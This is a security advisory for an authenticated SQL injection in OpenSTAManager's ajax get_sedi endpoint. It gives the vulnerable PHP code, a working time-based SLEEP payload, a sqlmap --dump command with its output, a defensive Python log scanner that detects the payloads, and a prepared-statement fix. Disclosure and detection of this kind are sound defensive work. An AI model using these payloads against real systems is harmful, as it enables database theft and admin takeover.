PT-2026-6494 · Packagist · Devcode-It/Openstamanager

Published: 2026-02-03 · Updated: 2026-02-03

CVSS v4.0: 8.7 (High)
Vector: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

A SQL injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject SQL through the idanagrafica parameter, leading to unauthorized database access.

Proof of Concept

Vulnerable Code

File: modules/anagrafiche/ajax/complete.php:28
case 'get_sedi':
  $idanagrafica = get('idanagrafica');
  // user-controlled value concatenated straight into the WHERE clause
  $q = "SELECT id, CONCAT_WS(' - ', nomesede, citta) AS descrizione
     FROM an_sedi
     WHERE idanagrafica='".$idanagrafica."' ...";
  $rs = $dbo->fetchArray($q);

Data Flow

  1. Source: $_GET['idanagrafica'], read through get('idanagrafica')
  2. Vulnerable: User input concatenated directly into SQL query with single quotes
  3. Sink: $dbo->fetchArray($q) executes the malicious query

Exploit

Manual PoC (Time-based Blind SQLi):
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
SQLMap Exploitation:
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
 --cookie="PHPSESSID=<session>" \
 --dbms=MySQL \
 --technique=T \
 --level=3 \
 --dump
SQLMap Output:
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
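As an added example (not from the advisory or the OpenSTAManager project), a defender-side check that scans web-server access logs for get_sedi requests whose idanagrafica value is not a plain integer, which flags the SLEEP-based probes shown above without depending on a payload signature. The log format and lines are constructed, and the script assumes the endpoint is served at /ajax_complete.php as in the PoC.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (common log format), not real traffic. Lines 2
# and 3 carry the advisory's two time-based payloads, percent-encoded as a
# client would send them; line 4 has an empty value.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Feb/2026:10:00:01 +0000] "GET /ajax_complete.php?op=get_sedi&idanagrafica=42 HTTP/1.1" 200 312
10.0.0.9 - - [03/Feb/2026:10:00:07 +0000] "GET /ajax_complete.php?op=get_sedi&idanagrafica=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29%20AND%20%271%27%3D%271 HTTP/1.1" 200 54
10.0.0.9 - - [03/Feb/2026:10:00:13 +0000] "GET /ajax_complete.php?op=get_sedi&idanagrafica=1%27%20AND%20%28SELECT%202572%20FROM%20%28SELECT%28SLEEP%285%29%29%29oOnc%29--%20rhVF HTTP/1.1" 200 54
10.0.0.5 - - [03/Feb/2026:10:00:20 +0000] "GET /ajax_complete.php?op=get_sedi&idanagrafica= HTTP/1.1" 200 10
10.0.0.7 - - [03/Feb/2026:10:00:25 +0000] "GET /index.php HTTP/1.1" 200 9001
"""

# Client IP and request target from a common-log-format line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# Delay primitives used by time-based blind probes against MySQL.
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def sedi_parameter(target):
    """Decoded idanagrafica value for get_sedi requests, else None."""
    parts = urlsplit(target)
    if parts.path != "/ajax_complete.php":
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    if params.get("op") != ["get_sedi"]:
        return None
    return params.get("idanagrafica", [""])[0]


def classify_value(value):
    """None for a plain integer ID (the column's contract), else a label."""
    if value.isascii() and value.isdigit():
        return None
    if TIME_BASED_RE.search(value):
        return "sqli-time-based"   # high confidence: delay function present
    return "non-numeric-id"        # lower confidence: malformed or other payload


def scan_log(text):
    """Return (client_ip, label, decoded_value) for every flagged request."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        value = match and sedi_parameter(match.group("target"))
        if value is None:
            continue
        label = classify_value(value)
        if label:
            findings.append((match.group("ip"), label, value))
    return findings
```

The integer check is the durable part: once the parameter is known to be a record ID, any non-digit value is out of contract regardless of which injection technique it carries.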

Impact

  • Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
  • Privilege Escalation: Modification of the zz_users table to gain admin access
  • Data Integrity: Unauthorized modification or deletion of records
  • Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

  • OpenSTAManager: Verified in latest version (as of December 2025)
  • All versions using this endpoint are likely affected

Remediation

Replace direct concatenation with prepared statements:

Before:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

After:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Credit

Discovered by: Łukasz Rybak

Fix

SQL injection

Weakness Enumeration

Related Identifiers

GHSA-W995-FF8H-RPPG

Affected Products

Devcode-It/Openstamanager